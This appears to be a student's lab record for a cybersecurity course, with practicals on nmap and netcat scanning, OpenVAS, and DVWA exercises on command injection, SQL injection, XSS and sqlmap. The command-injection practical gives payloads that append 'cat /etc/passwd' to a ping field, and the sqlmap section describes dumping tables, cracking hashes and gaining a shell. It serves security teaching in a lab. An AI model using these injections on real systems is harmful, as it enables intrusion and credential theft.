Documente Academic
Documente Profesional
Documente Cultură
: 161120105045
Practical- 2
NMAP is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. However, nmap command comes with
lots of options that can make the utility more robust and difficult to follow for new
users.
The purpose of this post is to introduce a user to the nmap command line tool to
scan a host and/or network, so to find out the possible vulnerable points in the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.
nmap is short for Network Mapper. It is an open source security tool for network
exploration, security scanning and auditing. However, nmap command comes with
lots of options that can make the utility more robust and difficult to follow for new
users.
The purpose of this post is to introduce a user to the nmap command line tool to
scan a host and/or network, so to find out the possible vulnerable points in the hosts.
You will also learn how to use Nmap for offensive and defensive purposes.
nmap 192.168.1.1,2,3
1|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Sample outputs:
server1.cyberciti.biz
192.168.1.0/24
192.168.1.1/24
10.1.2.3
localhost
2|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical- 2
Nmap uses raw IP packets in novel ways to determine what hosts are available on
the network, what services (application name and version) those hosts are offering,
what operating systems (and OS versions) they are running, what type of packet
filters/firewalls are in use, and dozens of other characteristics.
It was designed to rapidly scan large networks, but works fine against single hosts.
Nmap runs on all major computer operating systems, and both console and
graphical versions are available.
Solution :
map -p [port] hostName
## Scan port 80
nmap -p 80 192.168.1.1
## Scan TCP port 80
nmap -p T:80 192.168.1.1
## Scan UDP port 53
nmap -p U:53 192.168.1.1
## Scan two ports ##
nmap -p 80,443 192.168.1.1
## Scan port ranges ##
nmap -p 80-200 192.168.1.1
## Combine all options ##
nmap -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap -p U:53,111,137,T:21-25,80,139,8080 server1.cyberciti.biz
nmap -v -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.1.254
## Scan all ports with * wildcard ##
nmap -p "*" 192.168.1.1
## Scan top ports i.e. scan $number most common ports ##
nmap --top-ports 5 192.168.1.1
nmap --top-ports 10 192.168.1.1
outputs
3|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
4|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical:3
Aim: TCP / UDP connectivity using Netcat
What is Netcat?
nc, also known as the TCP/IP swiss army knife is a feature rich network utility
which can be used to read and write data to network connections using TCP or
UDP.
What is portscanning?
Open a new terminal (CTRL+ALT+T in Ubuntu) and run the following command
to perform a TCP port scan.
nc -v -z 127.0.0.1 25
5|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
nc -v -z host port-range
6|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical:4
Aim: Network Vulnerability using OpenVAS
In this exercise we will show a popular open source vulnerability scanner called
OpenVAS (Open Vulnerability Assessment System). OpenVAS is the evolution of
a previous project called Nessus, which became a proprietary tool. The actual
security scanner is accompanied with a daily updated feed of Network Vulnerability
Tests (NVTs), over 20,000 in total (as of January 2011).
Notes :
Commands preceded with \$" imply that you should execute the command as a
general user - not as root.
Commands preceded with \#" imply that you should be working as root.
Commands with more speci c command lines (e.g. \RTR-GW>" or \mysql>") imply
that you are executing commands on remote equipment, or within another program.
Installation
$ sudo openvas-nvt-sync
7|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Ideally, you will want to only allow scanning on hosts that are under your control.
To understand the syntax, check the openvas-adduser man page.
Let's allow this user to scan hosts in our lab network. Type
accept 10.10.0./16 default deny
Operation
The server has to load thousands of vulnerability checks, which takes VERY
LONG, especially on a machine that is not very powerful. Most likely, you will not
be able to run this on the virtual NSRC lab.
On a production setup, you will need a machine with multiple processors/ cores and
a quite a bit of RAM, especially if you will be scanning many hosts.
Running a scan
$ cd /home/sysadm $ vi scanme.txt
10.10.0.250
10.10.2.5
$ man openvas-client
8|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
You might have to transfer that le to your laptop so that you can open it with a
browser.
You could take advantage of concurrent versioning systems like Subversion or Git
to keep track of changes in the hosts you scan.
Add a cron job to scan hosts periodically (e.g. once a month) Use -T txt or -T xml
report format
9|Page
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical-5
AIM: Web application testing using DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn
vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a
legal environment, help web developers better understand the processes of securing web
applications and aid teachers/students to teach/learn web application security in a class
room environment.
The purpose of the command injection attack is to inject and execute commands specified
by the attacker in the vulnerable application.
In situations like this, the application, which executes unwanted system commands, is
like a pseudo system shell, and the attacker may use it
as an authorized system user.
Note, the commands are executed with the same privileges as the application and/or web
server.
Command injection attacks are possible in most cases because of lack of correct input
data validation, which can be manipulated by the attacker (forms, cookies, HTTP headers
etc.).
10 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. On Your Host Computer, Go To
2. Start --> All Program --> VMWare --> VMWare Player
Instructions:
1. Highlight fedora14
2. Click Edit virtual machine settings
o Instructions:
b. Select Bridged
11 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. Start Up VMWare Player
2. Select Fedora14
3. Play virtual machine
12 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
2. Login to Fedora14
Instructions:
1. Login: student
2. Password: <whatever you set it to>.
Instructions:
1. Applications --> Terminal
13 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. su - root
2. <Whatever you set the root password to>
3 Get IP Address
Instructions:
1. ifconfig -a
Notes:
o As indicated below, my IP address is 192.168.1.106.
o Please record your IP address.
14 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. Applications --> Internet --> Firefox
Notes:
o You can open up a Web browser on any Operating System on your network.
o Working with DVWA does not have to be done on your Fedora machine, the only
requirement to play with DVWA is a follow
1. The Fedora Server is on the Network.
2. httpd is running
3. mysqld is running
15 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. http://192.168.1.106/dvwa/login.php
Replace 192.168.1.106 with the IP Address obtained from Section 3, Step
3.
2. Username: admin
3. Password: password
"password" is the default password for user admin.
16 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. Click on DVWA Security
Instructions:
1. Select Low
2. Click Submit
17 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
1 Command Execution
Instructions:
1. Click on Command Execution
2 Execute Ping
Notes:
o
Below we are going to do a simply ping test using the web interface.
o
As an example, ping something on your network.
o
Use the IP Address obtained in Section 3, Step 3 if you have nothing else to ping.
Instructions:
1. 192.168.1.106
2. Click Submit
18 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. cat /etc/passwd
2. Click Submit
Notes:
o Notice that either a messaging saying illegal IP address was displayed or nothing
was returned.
19 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. 192.168.1.106; cat /etc/passwd
2. Click Submit
Notes:
o Notice that we are now able to see the contents of the /etc/passwd file.
Instructions:
1. Bring up a terminal window (See Section 3, Step 1, if you don't know how)
2. cat /var/www/html/dvwa/vulnerabilities/exec/source/low.php
Notes:
1. Notice the two shell_exec lines.
2. These are the lines that execute ping depending on which Operating System is
being used.
3. In Unix/Linux command, you can run multiple command separated by a ";".
4. Notice the code does not check that if $target matches an IP Address
\d+.\d+.\d+.\d+, where "\d+" represents a number with the possibility of
multiple digits, like 192.168.1.106.
5. The code allows for an attacker to append commands behind the IP Address.
1. 192.168.1.106; cat /etc/passwd
20 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Instructions:
1. 192.168.1.106; cat /etc/passwd | tee /tmp/passwd
Note:
o Here we are not only displaying the contents of /etc/passwd on the webpage, but
also we are copying the /etc/passwd file to the /tmp directory.
21 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
1 Proof of Lab
Instructions:
1. Bring up a terminal windows
2. cd /tmp
3. ls -l passwd
4. date
5. echo "Your Name"
Replace the string "Your Name" with your actual name.
e.g., echo "John Gray"
Proof of Lab Instructions:
1. Do a <PrtScn>
2. Paste into a word document
3. Upload to Moodle
22 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical-6
AIM: SQL INJECTION USING DVWA
SQL injection is considered a high risk vulnerability due to the fact that can lead to full
compromise of the remote system. This is why in almost all web application penetration testing
engagements, the applications are always checked for SQL injection flaws.A general and simple
definition of when an application is vulnerable to SQL injection is when the application allows
you to interact with the database and to execute queries on the database then it is vulnerable to
SQL injection attacks.
DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment
SQL Injection
SQL injection (also known as SQL fishing) is a technique often used to attack data driven
applications.
This is done by including portions of SQL statements in an entry field in an attempt to get the
website to pass a newly formed rogue SQL command to the database (e.g., dump the database
contents to the attacker). SQL injection is a code injection technique that exploits a security
vulnerability in an application's software.
The vulnerability happens when user input is either incorrectly filtered for string literal escape
characters embedded in SQL statements or user input is not strongly typed and unexpectedly
executed. SQL injection is mostly known as an attack vector for websites but can be used to
attack any type of SQL database.
PROCESS
Install XAMPP
Copy DVWA-1.0.8 INTO XAMPP/HTDOCS folder
Start XAMPP program
Start APACHE and MYSQL module by clicking on start.
23 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Start Firefox
Type http://127.0.0.1/DVWA-1.0.8/login.php
Login: admin
Password: password
Click on Login
24 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Click Submit
25 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical-7
Aim: XSS using DVWA
What is Damn Vulnerable Web App (DVWA)?
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.
Its main goals are to be an aid for security professionals to test their skills and tools in a legal
environment, help web developers better understand the processes of securing web applications
and aid teachers/students to teach/learn web application security in a class room environment.
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web
applications.
XSS enables attackers to inject client-side script into Web pages viewed by other users.
A cross-site scripting vulnerability may be used by attackers to bypass access controls such as
the same origin policy.In Addition, the attacker can send input (e.g., username, password, session
ID, etc) which can be later captured by an external script.The victim's browser has no way to
know that the script should not be trusted, and will execute the script. Because it thinks the script
came from a trusted source, the malicious script can access any cookies, session tokens, or other
sensitive information retained by the browser and used with that site.
Step 1:
26 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Step 3:
27 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Step 5: Result
28 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Practical-8
Aim : Automated SQL injection with SqlMap
sqlmap is an open source penetration testing tool that automates the process of detecting and
exploiting SQL injection flaws and taking over of database servers. It comes with a powerful
detection engine, many niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the database, to accessing
the underlying file system and executing commands on the operating system via out-of-band
connections.
Features
-Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access,
IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management
systems.
-Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-
based, UNION query-based, stacked queries and out-of-band.
-Support to directly connect to the database without passing via a SQL injection, by providing
DBMS credentials, IP address, port and database name.
-Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
-Automatic recognition of password hash formats and support for cracking them using a
dictionary-based attack.
-Support to dump database tables entirely, a range of entries or specific columns as per user's
choice. The user can also choose to dump only a range of characters from each column's entry.
-Support to search for specific database names, specific tables across all databases or
specific columns across all databases' tables. This is useful, for instance, to identify tables
29 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
containing custom application credentials where relevant columns' names contain string like
name and pass.
-Support to download and upload any file from the database server underlying file system
when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
-Support to execute arbitrary commands and retrieve their standard output on the database
server underlying operating system when the database software is MySQL, PostgreSQL or
Microsoft SQL Server.
Download
Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the
terminal with the python interpreter.
The above is the first and most simple command to run with the sqlmap tool. It checks the input
parameters to find if they are vulnerable to sql injection or not. For this sqlmap sends different
kinds of sql injection payloads to the input parameter and checks the output. In the process
sqlmap is also able to identify the remote system os, database name and version. Here is how the
output might look like
30 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
So the sqlmap tool has discovered the operating system, web server and database along with
version information. Even this much is pretty impressive. But its time to move on and see what
more is this tool capable of.
Discover Databases
Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next
step is to find out the names of the databases that exist on the remote system. The "--dbs" option
is used to get the database list.
31 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
Command
isnt this amazing ? it if ofcourse. Lets get the columns of a particular table now.
32 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
.......
The above command will simply dump the data of the particular table, very much like the
mysqldump command.
The output might look similar to this
33 | P a g e
CYBER SECURITY (2150002) Er.No.: 161120105045
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
The hash column seems to have the password hash. Try cracking the hash and then you would
get the login details rightaway. sqlmap will create a csv file containing the dump data for easy
analysis.
So far we have been able to collect a lot of information from the remote database using sqlmap.
Its almost like having direct access to remote database through a client like phpmyadmin. In real
scenarios hackers would try to gain a higher level to access to the system. For this, they would
try to crack the password hashes and try to login through the admin panel. Or they would try to
get an os shell using sqlmap.
34 | P a g e